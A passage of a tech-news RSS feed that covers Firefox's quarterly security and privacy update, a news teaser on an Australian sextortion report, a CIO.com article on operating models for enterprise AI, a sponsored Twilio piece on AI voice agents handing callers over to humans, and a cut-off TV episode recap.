<p><strong>Advanced Anti-Fingerprinting Protections:</strong> Firefox 151 expands our default anti-fingerprinting defenses by ensuring the Available Screen Resolution, Touch Points, and Canvas APIs will provide uniform results for all of our users while also maintaining performance and compatibility. On macOS, for example, these enhancements are expected to reduce the share of users identified as unique by more than 20%, making it significantly harder for websites to uniquely identify and track users using obscure fingerprinting.</p>

<p><strong>Local Network Access Protections:</strong> Firefox now requires user permission before websites can access apps and services on a user’s local network or device, helping prevent unauthorized access and sneaky tracking attempts. The <a href="https://support.mozilla.org/en-US/kb/control-personal-device-local-network-permissions-firefox">LNA</a> feature is rolling out gradually, starting with Firefox Desktop 151 through 153. Android support will follow in upcoming releases.</p>

<h3>Core Security</h3>

<p><strong>Firefox CA Root Program:</strong> We published <a href="https://blog.mozilla.org/security/2026/06/29/improving-transparency-and-assurance-in-the-web-pki-mozilla-root-store-policy-v3-1/">Root Store Policy v3.1</a>, introducing stricter transparency, documentation, and audit requirements for public CAs to strengthen trust in the Web PKI.</p>

<p><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2010193"><strong>WebAuthn Related Origin Requests</strong></a><strong>:</strong> This feature allows seamless passkey sign-ins across related domains e.g., the same provider using multiple top-level domains. In contrast to other browsers, Firefox UI provides transparency and choice so users are aware and can control when websites request for passkeys from other, related sites.</p>

<h3>Community Engagement</h3>

<p><strong>Hosting Events:</strong> We organized and hosted multiple <a href="https://www.meetup.com/de-DE/berlin-mozilla-meetup/">web tech meet-ups in the Mozilla Berlin office</a>, bringing together the developer community to explore the latest advances in web technology, privacy, and security. If you’re in the area, we’d love to have you join us at a future event.</p>

<p><strong>Community Shares:</strong>  Firefox tracking protection was presented at the <a href="https://www.reddit.com/r/SnooSec/comments/1te55fx/thanks_for_joining_us_at_snoosec_nyc/">SnooSec conference held in the Reddit NYC office</a>. We also had a presentation about existing and upcoming protections against web tracking at the <a href="https://chemnitzer.linux-tage.de/2026/en">Chemnitz Linux Days</a> conference, and a talk about the latest browser-based XSS protections at <a href="https://owasp.glueup.com/event/owasp-global-appsec-eu-2026-vienna-austria-162243/">OWASP AppSec ‘26</a> in Vienna.</p>

<h3>Web Security &amp; Standards</h3>

<p><strong>Web Application Integrity, Consistency and Transparency (WAICT):</strong> We are working on WAICT, a new proposal to bring stronger integrity and transparency guarantees to web applications, helping make the web a more trustworthy platform for security-sensitive applications such as end-to-end encrypted messaging. We shared our technical vision in a <a href="https://hacks.mozilla.org/2026/05/trustworthy-javascript-for-the-open-web/">Mozilla Hacks blog post</a>, including a prototype implementation in Firefox Nightly that works with our <a href="https://demo.waict.dev/">WAICT Demo</a> and a <a href="https://github.com/waict-wg">draft specification</a>.</p>

<p><strong>Sanitizer API:</strong> We are advancing the Sanitizer API to make robust protection against cross-site scripting (XSS) vulnerabilities more accessible. By exploring an <a href="https://github.com/mozilla/explainers/blob/main/trusted-or-sanitized-html.md">implicit sanitizer policy</a> that integrates with Trusted Types, we aim to prevent an entire class of XSS attacks with no application code changes, making secure-by-default web applications easier to build and deploy.</p>

<h3>Looking Ahead</h3>

<p>Firefox users will receive these security and privacy improvements automatically. If you’re not already a user, <a href="https://firefox.com/">we recommend you give it a try</a>. Firefox helps you shape a more personal internet that puts you back in control - all while supporting the non-profit Mozilla in its mission to keep the web open, safe, and accessible for everyone.</p>

<p>Thank you to everyone who contributes to making Firefox and the web more secure and privacy-focused. You can have an impact too, just by <a href="https://bugzilla.mozilla.org/enter_bug.cgi">reporting bugs</a>, conducting research, contributing code, or providing feedback.</p>

<p>We look forward to sharing more updates in the Q3 2026 edition.</p>

<p><em>— The Firefox Security &amp; Privacy Teams</em></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Young men report more ‘sextortion’ than any other age group, Australia’s online safety watchdog says]]></title>
<description><![CDATA[In six months last year, more than 2,000 such complaints were made to eSafetyGet our breaking news email, free app or daily news podcastA new report by Australia’s online safety regulator has found “significant gaps” in how major tech platforms tackle online sexual extortion and child sexual expl...]]></description>
<link>https://tsecurity.de/de/3665322/it-nachrichten/young-men-report-more-sextortion-than-any-other-age-group-australias-online-safety-watchdog-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665322/it-nachrichten/young-men-report-more-sextortion-than-any-other-age-group-australias-online-safety-watchdog-says/</guid>
<pubDate>Mon, 13 Jul 2026 15:03:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In six months last year, more than 2,000 such complaints were made to eSafety</p><ul><li><p>Get our <a href="https://www.theguardian.com/email-newsletters?CMP=cvau_sfl">breaking news email</a>, <a href="https://app.adjust.com/w4u7jx3">free app</a> or <a href="https://www.theguardian.com/australia-news/series/full-story?CMP=cvau_sfl">daily news podcast</a></p></li></ul><p>A new report by Australia’s online safety regulator has found “significant gaps” in how major tech platforms tackle online sexual extortion and child sexual exploitation, as “reports of this abuse continue to rise”.</p><p>The findings come from eSafety’s latest transparency report, examining how tech companies – including Apple, Meta, Google, Microsoft, Snap, Discord and WhatsApp – are addressing child sexual exploitation and abuse.</p> <a href="https://www.theguardian.com/technology/2026/jul/13/young-men-report-more-sextortion-than-any-other-age-group-australias-online-safety-watchdog-says-ntwnfb">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs must rethink operating models to unlock AI at scale]]></title>
<description><![CDATA[Almost every company has a board or executive AI mandate. Vendors are rolling out agentic AI platforms. The pressure to move is intense.



But the reality on the ground looks different. Eighty-three percent of organizations say data quality is their top AI challenge, and 74% struggle to demonstr...]]></description>
<link>https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664901/it-nachrichten/cios-must-rethink-operating-models-to-unlock-ai-at-scale/</guid>
<pubDate>Mon, 13 Jul 2026 12:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Almost every company has a <a href="https://www.cio.com/article/4171959/ceos-top-priorities-for-it-leaders-today-2.html">board or executive AI mandate</a>. Vendors are rolling out agentic AI platforms. The pressure to move is intense.</p>



<p>But the reality on the ground looks different. Eighty-three percent of organizations say <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">data quality is their top AI challenge</a>, and 74% struggle to demonstrate ROI, according to Lopez Research. And only 21% report having a mature <a href="https://www.csoonline.com/article/4176485/the-ai-governance-imperative-you-cant-afford-to-ignore-2.html">governance model for AI agents</a>, per Deloitte’s <a href="https://www.deloitte.com/us/en/about/press-room/state-of-ai-report-2026.html" rel="nofollow">2026 State of Enterprise AI</a> report.</p>



<p>“Agentic AI is real, and vendors’ offerings are very real, too,” says <a href="https://www.forrester.com/analyst-bio/boris-evelson/BIO1737" rel="nofollow">Boris Evelson</a>, vice president and principal analyst at Forrester. “However, most enterprises are still not ready to adopt at scale.”</p>



<p><a href="https://www.westmonroe.com/our-team/david-hilborn" rel="nofollow">Dave Hilborn</a>, who leads West Monroe’s Organization, People &amp; Change practice, frames it as a race with three arrows moving forward — one representing AI and tech evolution, one representing organizations and people, and one representing data. “The AI arrow is far out ahead,” he says. “That delta is the readiness gap.”</p>



<p>The gap <a href="https://www.cio.com/article/4192383/its-not-the-it-holding-ai-back-its-the-business-processes.html">isn’t the technology</a>. It’s the foundational work most organizations haven’t done: data readiness, operating models, governance, skills, and culture. The companies making progress aren’t waiting for vendors to solve these problems. They’re tackling the unglamorous work themselves.</p>



<h2 class="wp-block-heading">AI doesn’t tolerate ambiguity</h2>



<p>AI readiness can be framed across six levels — from data foundation at the base to <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">reinvented business experiences</a> at the top, says <a href="https://www.linkedin.com/in/afsheantalasaz/" rel="nofollow">Afshean Talasaz</a>, former CIO at Colonial Pipeline and now an executive advisor. One of the key areas that doesn’t always get the attention it needs is the operating model.<strong></strong></p>



<p>“The technology playbooks of the past don’t work in the AI world,” Talasaz says. “Those areas were able to tolerate more ambiguity between business and tech teams. AI doesn’t tolerate the same level of ambiguity. It needs clarity.”</p>



<p>That demands a different kind of partnership between IT and the business. AI systems learn from data — records and measurements of what’s actually happening in the business — and then operate within business processes. Unlike traditional software, which is built based on user requirements, AI is sandwiched between the business that produces the data and the business that consumes the outputs.</p>



<p>“AI is requiring IT and business teams to work more closely together, to be clearer about what AI will and will not do — that really close partnership is crucial,” Talasaz says. “It’s not something that will always naturally evolve. It requires a lot of intentionality about how teams need to work together to deliver outcomes.”</p>



<p>The <a href="https://www.cio.com/article/3801027/10-ai-strategy-questions-every-cio-must-answer.html">AI questions CIOs must answer</a> aren’t just technical. Do we have the right operating model? Have we balanced governance and standard operating procedures within the model? Have we organized teams appropriately? All this must be designed within the context of what the business actually needs.</p>



<p>Too many organizations are <a href="https://www.cio.com/article/4159287/most-companies-are-stuck-on-ai-chat.html">bolting AI onto existing processes</a> without redefining roles or workflows, Forrester’s Evelson. “Organizations can either incrementally enhance existing workflows by augmenting capabilities with AI or pursue a more transformative approach by redesigning the process end-to-end.”</p>



<p>The companies getting value are doing the latter.</p>



<h2 class="wp-block-heading">Data debt comes due</h2>



<p>Data readiness remains the most common barrier to scaling AI. “We’ve never fixed this data quality problem in most organizations,” says <a href="https://www.lopezresearch.com/" rel="nofollow">Maribel Lopez</a>, founder and principal analyst at Lopez Research, “and it comes back to haunt a company in spades as they move to AI.”</p>



<p>At Levi Strauss, the foundational work came first. “If you think about the Levi’s business, it’s quite complex — 100 countries, over 3,000 stores, multiple business models,” says <a href="https://www.levistrauss.com/who-we-are/leadership/jason-gowans/" rel="nofollow">Jason Gowans</a>, the company’s chief digital and technology officer. “You can imagine the complexity of gathering all that data to understand how the business is performing. The idea of this single source of truth — that’s been the biggest thing.”</p>



<p>Levi’s now has more than 1,100 standard operating procedures that govern how work gets done on top of SAP. “That’s fertile material to feed to LLMs on how work gets done,” Gowans says.The results are tangible: partner onboarding that once took three to six months to set up EDI exchanges now takes days.</p>



<p>At contract manufacturing company Jabil, <a href="https://www.linkedin.com/in/chase-christensen-b0447/" rel="nofollow">Chase Christensen</a>, segment CIO, took a similar path. “We had to get everyone to understand where the source data resides, put tech in place so consumption is easier, and drive ownership around data and decision rights — so 140,000 employees don’t feel empowered to create their own data sources that fall out of line.”</p>



<p>The data challenge goes beyond quality, Evelson notes. <a href="https://www.cio.com/article/4104444/8-tips-for-rebuilding-an-ai-ready-data-strategy.html">Most organizations’ data isn’t AI-ready</a>; it hasn’t been prepared for how AI systems consume and learn from information. “Data is siloed, poorly governed, and hard to discover, integrate, and trust,” he says.</p>



<p>Forrester research shows that 45% of data and analytics decision-makers were adopting vector databases in 2025, and 53% were adopting graph databases — investments that signal recognition of how much data architecture needs to evolve. The firm recommends a balanced approach: roughly 48% of AI spending on foundations such as data management and engineering, and 52% on consumption, including analytics, governance, and applications.</p>



<p>But even as organizations work to prepare existing data, AI is creating new challenges. Users leveraging AI tools are generating new forms of data and information that never make it into corporate databases, West Monroe’s Hilborn notes.</p>



<p>“There are explosions of new data, content, and insights being created on the periphery of these data lakes,” he says. “The challenge is how do you capture that and leverage it.”</p>



<h2 class="wp-block-heading">Who’s sponsoring this?</h2>



<p>Even when data is in order, many AI initiatives stall due to how they’re sponsored and funded.</p>



<p>“Enterprise data, analytics, and AI programs succeed when business CxOs sponsor them because they are accountable for business outcomes, not just technology delivery,” Forrester’s Evelson says. “IT-led initiatives often become siloed or tool-centric, whereas business sponsorship ensures alignment to enterprise strategy, prioritization of end-to-end use cases, and a focus on decisions and actions rather than insights alone.”</p>



<p>Too often, AI is still treated as a series of disconnected use cases rather than a sustained, multi-year investment. Evelson calls this the “use case trap” — organizations overindex on individual projects and miss the enterprise-wide compounding impact. That leads to fragmented priorities, inconsistent adoption, and difficulty demonstrating ROI.</p>



<p>Leadership readiness is a distinct layer of AI preparedness, Talasaz says. “Are leaders prepared to provide a vision of reinvented business experiences that become the north star?” he asks. “Leadership teams, at various levels of the organization, need to articulate what a reinvented business looks like so teams have the direction and support to build differentiating capabilities.”</p>



<p>Levi’s offers a counterexample. AI is a CEO priority there. At the last quarterly offsite, the execs were building agents. “When you’re committed to upskilling the workforce, you’re better served to answer how to rewire processes with AI at the core,” Gowans says. “It starts at the top. It has to be an exec priority.”</p>



<h2 class="wp-block-heading">Fear, literacy, and two types of AI</h2>



<p>Technical talent is only part of the equation. Organizations also need to <a href="https://www.cio.com/article/4016354/cios-tackle-the-ai-change-management-challenge.html">address change management</a>.</p>



<p>“We saw it with the AI boom — fear about jobs, not knowing what AI did,” says Jabil’s Christensen. “The key is demystifying AI. We doubled down and focused on AI literacy. We want everyone to understand how it was put together, and that removed a lot of that fear. That’s been the biggest hurdle.”</p>



<p>Different types of AI require different skills and governance, Talasaz says. “General use focuses on productivity on the desktop,” he says. “Integrated AI — industrial-capable AI embedded within core business processes — requires different skills, capabilities, and governance.”</p>



<p>For desktop AI, training and guardrails help employees be successful — what Talasaz calls “bumpers,” like in bowling. Organizations need to <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">help employees through reskilling and guidance</a>. “You have tools in a toolbox,” he says. “It’s important to know when to use a power tool versus when you need a screwdriver.”</p>



<p>But for integrated AI embedded in core processes, the stakes are higher. “Business leaders responsible for business outcomes based on AI-driven processes need to be fully aware of both the benefits and risks that come along with using these tools,” Talasaz says.</p>



<p>That distinction matters for governance, too. Lower-, medium-, and high-risk AI use cases may require <a href="https://www.csoonline.com/article/4188573/rethinking-the-balance-between-ai-oversight-and-innovation.html">different ways of working and different risk management approaches</a>. “Deploying AI in potentially high-risk or high-cost areas of the business requires a higher level of rigor,” Talasaz says. “That’s different than building something that helps write my emails.”</p>



<h2 class="wp-block-heading">From POC to production</h2>



<p>Perhaps the biggest readiness gap is the transition <a href="https://www.cio.com/article/3850763/88-of-ai-pilots-fail-to-reach-production-but-thats-not-all-on-it.html">from proof of concept to production</a>. “It requires such a different approach,” Talasaz says. “A successful proof of concept can create a lot of excitement, but when teams are unprepared to build and scale, it can create the potential to over-promise and under-deliver.”</p>



<p>The operating model that works for experimentation doesn’t work for production at scale. Proofs of concept are designed to demonstrate the efficacy of ideas and the underlying technology. But building, scaling, and sustaining technology in the business requires operating models, standards, roles, and skills that many organizations haven’t developed. Intentionally designed operating models reduce the cost of learning, improve execution, and increase delivery velocity, says Talasaz.</p>



<p>But there’s no one-size-fits-all answer. “A business that needs to build capabilities in a marketplace moving very fast requires one kind of operating model,” Talasaz says. “A business that can take longer to develop business capabilities and adapt to market changes can choose a different operating model. It’s important to design ways of working tailored to what the business needs and the speed at which the business needs to leverage technology to be successful.”</p>



<p>Jabil is navigating this journey as part of its move to SAP’s cloud ERP through RISE, scaling from $29 billion to $34 billion in revenue while keeping selling, general, and administrative (SG&amp;A) expenses relatively flat — in part by layering generative AI onto predictive analytics capabilities built over years.</p>



<p>“We started years ago with computer vision to drive product quality,” Christensen says. “As gen AI blew up, we took the predictive analytics we had <a href="https://www.cio.com/article/193580/upskilling-transforms-jabil-employees-into-data-scientists.html">built over the years</a> and imbued them with gen AI. We’ve implemented the basics, and now we’re looking for complex scenarios.”</p>



<h2 class="wp-block-heading">Governance built in, not bolted on</h2>



<p>Governance is often treated as a policy document or committee. It should be embedded in the operating model itself, Talasaz argues.</p>



<p>“The operating model doesn’t always get the attention it needs,” he says. “Policies and committees are useful, but they should handle larger enterprise risks. Most of the governance should be embedded in the operating model to ensure you’re getting outcomes you want.”</p>



<p>That might mean peer review built into the development process, bias checks before deployment, or clear escalation paths for high-risk use cases. When governance is separate from the operating model, it tends to slow things down. When it’s integrated, it becomes how work naturally gets done, says Talasaz.</p>



<p>Governance at the agent level matters, too, Levi’s Gowans says. “Know what agents have been deployed, who authored them, and who’s responsible,” he says, noting that the company has established a registry to understand what agents it has operating within its networks.</p>



<p>The challenges of AI governance are unique, Lopez of Lopez Research says. “Very few people have the governance stack required to say they did the right things with AI,” she says. “<a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">Non-human identity</a> and access control is totally different and, frankly, evolving so quickly that no one knows what to do.”</p>



<p>The challenge is ultimately a trade-off, Forrester’s Evelson says. “Push agentic AI capabilities too far, and you risk creating a governance and compliance nightmare,” he says. “Tighten controls too aggressively, and you stifle innovation. Best practices for <a href="https://www.cio.com/article/4188566/cios-rethink-the-balance-between-ai-oversight-and-innovation.html">striking the right balance</a> are still being discovered.”</p>



<h2 class="wp-block-heading">It takes a team</h2>



<p>The AI readiness gap isn’t about technology — it’s about the work organizations have been deferring for years. Data quality. Operating models. Executive sponsorship. Skills and culture. Governance embedded in process.</p>



<p>“Once you progress from everyone using Copilot to putting agents in production, then you realize the need for business context,” Gowans of Levi Strauss says.</p>



<p>It’s a shared journey requiring all teams to understand what’s required, Talasaz says. “It involves helping people understand what it takes from all sides — the technology itself, the operating model, the skills and talents needed — but also working with business leaders on the art of the possible,” he says. “Helping them understand both the benefits and the responsibility of deploying this tech.”</p>



<p>A colleague of his calls AI “the ultimate executive team sport.”</p>



<p>“It requires people to do it well and manage it,” Talasaz says.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI voice agents and the human touch: A new playbook for SME customer engagement]]></title>
<description><![CDATA[Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provi...]]></description>
<link>https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664586/it-nachrichten/ai-voice-agents-and-the-human-touch-a-new-playbook-for-sme-customer-engagement/</guid>
<pubDate>Mon, 13 Jul 2026 10:03:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Customer expectations don’t end when business hours do, which is why delivering a fast, always-on customer experience (CX) has traditionally required large call centres and significant resources. This often placed small businesses at a disadvantage, as many lacked the manpower and budget to provide 24/7 support at scale. Today, AI has completely levelled the playing field. Even small businesses now have access to powerful tools that can answer queries, resolve routine issues, and deliver highly personalised interactions around the clock.</p>



<p>But adopting AI in customer engagement is not just a question of efficiency. For smaller businesses especially, where loyalty is often built on familiarity, trust, and personal service, the real challenge is using AI in ways that strengthen rather than dilute the human connection that customers value most.</p>



<p>Human empathy combined with AI efficiency is a delicate blend. Done right, it ensures that every customer interaction feels personal, thoughtful, and seamless, whether the customer is engaging with a bot at 2 a.m. or a live agent during office hours.</p>



<p>So, how can small businesses embrace always-on virtual agents without losing the human connection that defines their identity? Here’s a practical playbook to guide the transition.</p>



<h2 class="wp-block-heading">1. Understand what customers want: Speed, simplicity, and empathy</h2>



<p>Before diving into AI adoption, it’s critical to understand what customers expect. Twilio’s <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>Di</em></a><em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" target="_blank" rel="sponsored">g</a></em><a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_digital-patience" rel="sponsored"><em>ital Patience</em></a> study suggests that while speed matters, it is not the only thing that customers value. Twilio found that 46% of respondents in the Asia-Pacific and Japan region say quick service and resolution are most important, but 51% say delays are acceptable if they lead to better customer support. The study also notes that customers are open to AI, but still value human touchpoints more highly.</p>



<p>The takeaway: AI should enhance CX, not replace it. Businesses can let natural-sounding AI voice agents handle inbound calls, regardless of peak hours or time zones. These virtual agents act as an intelligent frontline – answering common questions and qualifying leads – before seamlessly routing the conversation to a live human representative. The result? Callers get immediate answers, and the business captures every opportunity without losing the human touch.</p>



<h2 class="wp-block-heading">2. Map the handover points between AI and humans</h2>



<p>One of the most common pitfalls in implementing AI is failing to clearly define when and how customers transition from bots to human agents. To avoid customer frustration, organisations must thoughtfully map out these “handover points” by designing for two key principles: choice and continuity.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Choice</em></strong></h3>



<p>Give customers the option to reach a human when needed. While AI is perfectly suited for routine inquiries like FAQs or order tracking, customers should never feel trapped in a bot loop. Always provide a clear, accessible option for them to choose to escalate the issue. Additionally, configure your system to proactively step in and offer a human handoff the moment it detects emotion, ambiguity, or complex steps.</p>



<h3 class="wp-block-heading"><strong><em>Designing for Continuity</em></strong></h3>



<p>Effective handovers rely on technology that recognises when an issue exceeds AI’s scope. By leveraging natural language processing and intelligent routing, organisations can ensure the transition from machine to human is frictionless. Crucially, this means automatically carrying the full history and context of the interaction forward so the customer never needs to repeat themselves.</p>



<p>Achieving this level of continuity requires a new approach to managing interaction data during handovers. Instead of passing along a raw transcript, organisations need a managed memory service that provides agents with persistent context across every conversation, channel, and session. By transforming customer preferences, unresolved issues, and intent into a structured semantic profile—one that continuously evolves and reconciles new interactions as they occur—agents can quickly understand the relationship and continue the interaction without disruption.</p>



<p>To support truly omnichannel experiences, the system must also resolve identity automatically across touchpoints, linking interactions from phone, email, messaging apps, and other channels to a single customer profile. Equally important is the ability to surface only the information that is relevant to the task at hand. By presenting agents with a concise summary of the active issue and customer preferences, grounded in verified business knowledge such as product policies and FAQs, organisations can reduce resolution times while ensuring customers experience a seamless continuation of the conversation.</p>



<h2 class="wp-block-heading">3. Don’t automate for automation’s sake</h2>



<p>AI adoption should never feel like a “set it and forget it” strategy. Instead, it should be approached as a way to solve real business problems. It starts with asking questions like: What are the most time-consuming tasks for the team? What frustrates customers the most?</p>



<p>For instance, a restaurant might automate table reservations and menu queries, while a small online retailer could deploy AI to handle order status updates or product recommendations. These targeted use cases ensure that AI adds tangible value without overwhelming operations.</p>



<p>Take the example of <a href="https://customers.twilio.com/en-us/driva?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Driva</a>, a fast-growing online finance broker that deployed AI-powered customer service tools to answer routine enquiries and provide immediate assistance while customers wait in the call queue. By automating common interactions, Driva reduced the volume of requests requiring human intervention and achieved a 5% uplift in conversion rates at key points in the customer journey.</p>



<h2 class="wp-block-heading">4. Invest in AI that connects</h2>



<p>While consumers embrace automation, <a href="https://www.twilio.com/en-us/lp/digital-patience-apj?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub_research" target="_blank" rel="sponsored">research</a> shows they still draw comfort from the warmth of a human voice. To make your virtual agents feel less robotic and more like an extension of your team, look for tools that:</p>



<ul class="wp-block-list">
<li>Deliver human-like voice AI experiences at scale through natural turn-taking and barge-in capabilities.</li>



<li>Connect interactions across voice, messaging, and digital channels into a single thread so every exchange builds on the last.</li>



<li>Leverage Natural Language Processing (NLP) that enables conversational systems to interpret context, mimic human tone, and even recognise sentiment.</li>



<li>Place orchestration at the heart of the experience. An effective orchestration engine acts as the “conductor,” actively coordinating workflows and routing interactions so the right resource—whether an AI bot or a human—handles the right moment.</li>
</ul>



<p>When AI bots, automated workflows, and human teams are seamlessly coordinated behind the scenes, the customer simply experiences one unbroken, dynamic dialogue. For small enterprises, this means delivering sophisticated experiences that effortlessly bridge the gap between automation and live support, even at scale.</p>



<h2 class="wp-block-heading">5. Empower teams with real-time context</h2>



<p>AI is not about replacing human workers; it’s here to make jobs easier. However, for teams to fully embrace this new dynamic, organisations must shift their focus from retrospective performance reviews to real-time agent assistance. By feeding agents context as the conversation happens, businesses ensure that every interaction never starts from scratch.</p>



<ul class="wp-block-list">
<li><strong>Leveraging Conversational Intelligence: </strong>Use a real-time intelligence layer that turns live conversations into signals and actions. By analysing voice and messaging with generative AI Language Operators, businesses can understand intent, sentiment, and churn risk instantly, allowing human and AI agents to act in the moment with the right response or escalation.</li>



<li><strong>In-the-Moment Guidance:</strong> Give agents instant context and in-the-moment guidance during every interaction. Surfacing relevant customer history, next-best action suggestions, and summaries in real time allows agents to resolve issues faster without switching tools.</li>



<li><strong>Resolving Complex Customer Needs:</strong> AI can handle routine enquiries with low latency, but human agents still excel at nuanced problem-solving. With AI feeding them persistent customer memory and sentiment analysis in real time, human agents can skip the repetitive questions and immediately focus on resolving complex issues, rescuing deals, or preventing churn.</li>
</ul>



<p>When employees are equipped with real-time customer data and voice-driven insights, SMEs empower their teams to stop reacting to problems and start responding to customers proactively.</p>



<p>Consider global AI platform <a href="https://customers.twilio.com/en-us/genspark?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_ai-voice-agent_brandposthub" target="_blank" rel="sponsored">Genspark</a>, which leverages a Programmable Voice API for its “Call for Me” agent to handle complex outbound tasks like checking supplier pricing or booking international hotels. The AI can conduct real-time, natural conversations across different languages on the user’s behalf, seamlessly navigating the live interactions before delivering a structured summary. Because these natural voice experiences depend entirely on speed and consistency, the underlying infrastructure provides the critical sub-second latency necessary to keep every automated call clear and uninterrupted.</p>



<h2 class="wp-block-heading">6. Maintain transparency with customers</h2>



<p>Finally, a successful AI implementation requires transparency. Customers should always know when they’re communicating with a bot and when they’ve been handed over to a human. AI-powered interactions must offer clarity by providing transparency about when and how AI is used and explaining next steps in plain language.</p>



<p>Transparency builds trust. Small businesses can go a step further by soliciting customer feedback on their AI interactions and using this input to fine-tune their systems.</p>



<p>For small enterprises, the AI-to-human handover isn’t about choosing between humans and machines; it’s about combining the strengths of both to create exceptional customer experiences. AI can provide the speed and efficiency customers expect, while humans deliver the empathy and creativity they value.</p>



<p>By strategically defining handover points, investing in human-like AI, and empowering agents to work alongside technology, organisations can build a CX strategy that’s as scalable as it is personal.</p>



<p>This blended approach ensures that every interaction – whether managed by a bot or a human – is thoughtful, natural, and distinctly on-brand.  </p>



<p>To learn more about Twilio, visit <a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-ai-voice-agent_brandposthub" target="_blank" rel="sponsored">here</a>.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agent Kim Reactivated Season 1 Episode 6 Recap: Kim Finally Reaches Min-ji]]></title>
<description><![CDATA[Agent Kim Reactivated Season 1, Episode 6 finally brings Manager Kim within reach of Min-ji, but their reunion creates new problems that will shape the remaining episodes.



Kim, Jin-cheol, and Han-su’s Past







Episode 6 opens with another flashback featuring Kim, Jin-cheol, and Han-su durin...]]></description>
<link>https://tsecurity.de/de/3664554/ios-mac-os/agent-kim-reactivated-season-1-episode-6-recap-kim-finally-reaches-min-ji/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664554/ios-mac-os/agent-kim-reactivated-season-1-episode-6-recap-kim-finally-reaches-min-ji/</guid>
<pubDate>Mon, 13 Jul 2026 09:40:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Season 1, Episode 6 finally brings Manager Kim within reach of Min-ji, but their reunion creates new problems that will shape the remaining episodes.



Kim, Jin-cheol, and Han-su’s Past







Episode 6 opens with another flashback featuring Kim, Jin-cheol, and Han-su during their time as operatives. Set on Jeju Island in 2006, the mission involves protecting the visiting U.S. president’s daughter.



The sequence mainly shows how the three men worked together before their lives moved in different directions. Their contrasting personalities created disagreements even then, but their combined skills made them an effective team.



This history becomes important during the present-day rescue mission. Kim remains focused on finding Min-ji, while Jin-cheol and Han-su bring their own chaotic energy to the operation. Their arguments add humour without weakening the danger surrounding them.



Min-ji Tries to Outsmart Mr. Ju



After entering Mr. Ju’s car at the end of Episode 5, Min-ji quickly realises that she has walked into another trap. Mr. Ju presents himself as someone who can help her, but she understands that the powerful father of her school bully cannot be trusted.



Min-ji stays calm and pretends to know less than she does. She listens carefully, looks for opportunities to contact her father, and tries to delay Mr. Ju’s plans.



Her actions continue to show that she is more than someone waiting to be rescued. She understands when to remain silent and when to use the information she has gathered.



However, too many people are searching for her. Golden Teeth remains alive and wants revenge, while Sang-a and the SMD laundromat group become involved in the growing conflict. Every time Min-ji escapes one dangerous situation, another enemy closes in.



Min-ji Learns the Truth About Her Father



Episode 6 also changes Min-ji’s understanding of Manager Kim. For the first time, she begins to learn what her father actually did before becoming an ordinary office worker.



